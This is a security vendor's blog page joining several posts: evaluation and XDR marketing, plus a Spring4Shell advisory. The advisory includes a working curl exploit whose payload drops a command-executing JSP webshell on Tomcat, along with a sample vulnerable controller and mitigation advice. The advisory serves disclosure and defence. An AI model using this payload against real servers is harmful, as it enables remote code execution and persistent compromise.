While traditional approaches give customers more buttons and levers to figure it out themselves, Rapid7’s approach is from a different angle. How do we provide sophisticated detection and response without creating more work for an already overworked SOC team? What started as a journey to provide (what was a new category at the time) user and entity behavior analytics (UEBA) evolved into a leading cloud SIEM, and it’s now ushering in the next era of detection and response with XDR.

Key takeaways of the MITRE Engenuity ATT&CK Evaluation

Demonstrated strong visibility across ATT&CK, with telemetry, tactic, or technique coverage across 18 of the 19 phases covered across both simulations
Consistently indicated threats early in the cyber killchain, with solid detections coverage across Initial Compromise in the Sandworm evaluation and both Initial Compromise and Initial Discovery in the Wizard Spider evaluation
Showcased our commitment to providing a strong signal-to-noise ratio within our detections library with targeted and focused detections across each phase of the attack (versus alerting on every small substep)

As our customers know, these endpoint capabilities are just the tip of the spear with InsightIDR. While not within the scope of this evaluation, we also fired several targeted alerts that didn’t map to MITRE-defined subtypes — offering additional coverage beyond the framework. We know that with our other native telemetry capabilities for user behavior analytics, network traffic analysis, and cloud detections, InsightIDR provides relevant signals and valuable context in a real-world scenario — not to mention the additional protection, intelligence, and accelerated response that the broader Insight platform delivers in such a use case.

Thank you!

We want to thank MITRE Engenuity for the opportunity to participate in this evaluation. While we are very proud of our results, we also learned a lot throughout the process and are actively working to implement those learnings to improve our endpoint capabilities for customers. We would also like to thank our customers and partners for their continued feedback. Your insights continue to inspire our team and elevate Rapid7’s products, making more successful detection and response accessible for all.

To learn more about how Rapid7 helps organizations achieve stronger signal-to-noise while still having defense in depth across the attack chain, join our webcast where we’ll be breaking down this evaluation and more.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Spring4Shell: Zero-Day Vulnerability in Spring Framework

Posted 3 years ago by Jake Baines

If you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from Log4Shell. While discovery and research is evolving, we’re posting the facts we’ve gathered and updating guidance as new information becomes available.

What Rapid7 customers can expect

Our team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.

Our team will be updating this blog continually. Our next update will be at 9 PM EDT on March 30, 2022.

Introduction

On March 30, 2022, rumors began to circulate about an unpatched remote code execution (RCE) vulnerability in Spring Framework when a Chinese-speaking researcher published a GitHub commit that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by Spring.io (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly deleted.

Spring4Shell: Zero-Day Vulnerability in Spring Framework

A lot of confusion followed for several reasons:

The researcher’s original technical writeup needed to be translated.
The vulnerability (and proof of concept) isn’t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below.
A completely different unauthenticated RCE vulnerability was published yesterday (March 29, 2022) for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.

Rapid7’s research team has confirmed the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it’s currently unclear which real-world applications use the vulnerable functionality. This code ends up resulting in widespread exploitation or no exploitation at all, depending on how the features are used.

Recreating exploitation

The vulnerability appears to affect functions that use the @RequestMapping annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a Springframework MVC demonstration:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {

	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Here we have a controller (HelloWorldController) that, when loaded into Tomcat, will handle HTTP requests to http://name/appname/rapid7. The function that handles the request is called vulnerable and has a POJO parameter HelloWorld. Here, HelloWorld is stripped down but POJO can be quite complicated if need be:

package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

And that’s it. That’s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)

If we compile the project and host it on Tomcat, we can then exploit it with the following curl command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):

curl -v -d "class.module.classLoader.resources.context.parent.pipeline
.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%
22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt
ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%
20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20
while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7
D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context
.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources
.context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl
assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl
ass.module.classLoader.resources.context.parent.pipeline.first.fileDat
eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-
SNAPSHOT/rapid7

This payload drops a password protected webshell in the Tomcat ROOT directory called tomcatwar.jsp, and it looks like this:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in
= -.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.
println(new String(b)); } } -

Attackers can then invoke commands. Here is an example of executing whoami to get albinolobster:

Spring4Shell: Zero-Day Vulnerability in Spring Framework

The Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.

About the payload

The payload we’ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014 and alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload. A good technical writeup can be found here.

This is just one possible payload and will not be the only one. We’re certain that malicious class-loading payloads will appear quickly.

Mitigation guidance

This zero-day vulnerability is unpatched and has no CVE assigned as of March 30, 2022. The Spring documentation for DataBinder explicitly notes:

... [T]here are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.

Therefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.

If your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.

Until a patch is available, and if an organization is unable to use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, “post-exploitation” attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.

Vulnerability disambiguation

There has been significant confusion about the zero-day vulnerability we discuss in this blog post because an unrelated vulnerability in another Spring project was published yesterday (March 29, 2022). That vulnerability, CVE-2022-22963, affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963. CVE-2022-22963 is completely unrelated to the zero-day RCE under investigation in this blog post.

Further, yet another vulnerability CVE-2022-22950 was assigned on March 28th. A fix was released on the same day. To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 to 5.3.16. This CVE is completely unrelated to the zero-day RCE under investigation in this blog post.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Demystifying XDR: The Time for Implementation Is Now

Posted 3 years ago by Jesse Mack

In previous installments of our conversation with Forrester Analyst Allie Mellen on all things extended detection and response (XDR), she helped us understand not only the foundations of the product category and its relationship with security information and event management (SIEM), but also the role of automation and curated detections. But Sam Adams, Rapid's VP of Detection and Response, still has a few key questions, the first of which is: What do XDR implementations actually look like today?

A tale of two XDRs

Allie is quick to point out what XDR looks like in practice can run the gamut, but that said, there are two broad categories that most XDR implementations among security operations centers (SOCs) fall under right now.

XDR all-stars

These are the organizations that "are very advanced in their XDR journey," Allie said."They are design partners for XDR; they're working very closely with the vendors that they're using." These are the kinds of organizations that are looking to XDR to fully replace their SIEM, or who are at least somewhat close to that stage of maturity.

To that end, these security teams are also integrating their XDR tools with identity and access management, cloud security, and other products to create a holistic vision.

Targeted users

The other major group of XDR adopters is those utilizing the tool to achieve more targeted outcomes. They typically purchase an XDR solution and have this running alongside their SIEM — but Allie points out that this model comes with some points of friction.

"The end users see the overlapping use cases between SIEM and XDR," she said, "but the outcomes that XDR is able to provide are what's differentiating it from just putting all of that data into the SIEM and looking for outcomes."

The common ground

This relatively stratified picture of XDR implementations is due in large part to how early-stage the product category is, Allie notes.

"There's no one way to implement XDR," she said. "It's kind of a mishmash of the different products that the vendor supports."

That picture is likely to become a lot clearer and more focused as the category matures — and Allie is already starting to see some common threads emerge. She notes that most implementations have a couple things in common:

They are at some level replacing endpoint detection and response (EDR) by incorporating more sources of telemetry.
They are augmenting (though not always fully replacing) SIEM solutions' capabilities for detection and response.

Allie expects that over the next 5 years, XDR will continue to "siphon off" those uses cases from SIEM. The last one to fall will likely be compliance, and at that point, XDR will need to evolve to meet that use case before it can fully replace SIEM.

Why now?

That brings us to Sam's final question for Allie: What makes now the right time for the shift to XDR to really take hold?

Allie identifies a few key drivers of the trend:

Market maturity: Managed detection and response (MDR) providers have been effectively doing XDR for some time now — much longer than the category has been defined. This is encouraging EDR vendors to build these capabilities directly into their platforms.
Incident responders' needs: SOC teams are generally happy with EDR and SIEM tools' capabilities, Allie says — they just need more of them. XDR's ability to introduce a wider range of telemetry sources is appealing in this context.
Need for greater ROI: Let's be real — SIEMs are expensive. Security teams are eager to get the most return possible out of the tools they are investing so much of their budget into.
Talent shortage: As the cybersecurity skills shortage worsens and SOCs are strapped for talent, security teams need tools that help them do more with less and drive outcomes with a leaner staff.

For those looking to begin their XDR journey in response to some of these trends, Allie recommends ensuring that your vendor can offer strong behavioral detections, automated response recommendations, and automated root-cause analysis, so your analysts can investigate faster.

"These three things are really critical to building a strong XDR capability," she said,"and even if it's a roadmap item for your vendor, that's going to give you a good basis to build from there."

Want more XDR insights from our conversation with Allie? Check out the full talk.

Additional reading:

SIEM and XDR: What’s Converging, What’s Not

Posted 3 years ago by Amy Hunt

Let’s start with the conclusion: Security incident and event management (SIEM) isn’t going anywhere anytime soon.

Today, most security analysts are using their SIEMs for detection and response, making it the core tool within the security operations center (SOC). SIEM aggregates and monitors critical security telemetry, enables companies to monitor and detect threats specific to their environment and policy violations, and addresses key regulatory and compliance use cases. It has served – and will continue to serve – very important, specific purposes in the security technology stack.

Where SIEMs have traditionally struggled is in keeping pace with the threat landscape. It expands and changes daily. Very, very few security teams have the resources to consume all the relevant threat intelligence, then create the rules and configure the detections necessary to find them.

Rapid7’s SIEM, InsightIDR, is the exception, designed with a detections-first approach.

InsightIDR leverages internal and external threat intelligence, encompassing your entire attack surface. Our detection library includes threat intelligence from Rapid7’s open-source community, advanced attack surface mapping, and proprietary machine learning. Detections are curated and constantly fine-tuned by our expert Threat Intelligence and Detections Engineering team.

InsightIDR is the only SIEM that can actually do extended detection and response (XDR). And we can’t help but think all the XDR buzz is the security industry’s way of letting you know that, yes, detection and response performance is still lacking.

A cloud SIEM can provide a strong XDR foundation — agile, tailored, adaptable, and elastic

A cloud SIEM approach gives you an elastic data lake that lets you collect and process telemetry across the environment. And the core benefits of SIEM are yours: log retention, fast and flexible search, reporting, and the ability to fine-tune and customize policy violations or other rules specifically for their environment or organization. Cloud SIEM with user and entity behavior analytics (UEBA) and correlation capabilities can already achieve XDR, tying disparate data sources together to normalize, correlate/attribute, and analyze.

Of course, some customers that purchased traditional SIEM for detection and response haven’t been able to get those outcomes. They don’t have a next-generation SIEM that supports big data and real-time event analysis. Perhaps machine learning and behavioral analytics aren’t there yet.

Or maybe the SIEM has security teams drowning in alerts, ignoring too many of them. Detection and response is really hard — and it really is a symphony — especially as the environment continues to sprawl and resources remain scarce.

XDR aims to solve the challenges of the SIEM tool for effective detection and response to targeted attacks and includes behavior analysis, threat intelligence, behavior profiling, recommendations, and automation. The foundation is everything.

When we introduced InsightIDR some time ago, some criticized it as trying to do “too much”

It turns out we were doing XDR.

Today, our highly manicured detections library is expertly vetted by our global Rapid7 Managed Detection and Response (MDR) SOC, where we also get emergent threat coverage. It’s single-platform, integrated with raw threat intel from Rapid7’s open-source communities (Metasploit, Heisenberg, Sonar, Velociraptor) and strengthened signal-to-noise following our acquisition of IntSights external threat intelligence.

Call it what you like

SIEM and XDR are described as “alternatives,” “complementary,” and also barreling toward one another destined to collide. We’ve read how one is dead and the other is the future. (Must it always be this way?)

No matter what you call it, focus on the outcomes, not the acronyms. It's easy to get lost in the buzz, but the best products for your business will be those that address your top priorities.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.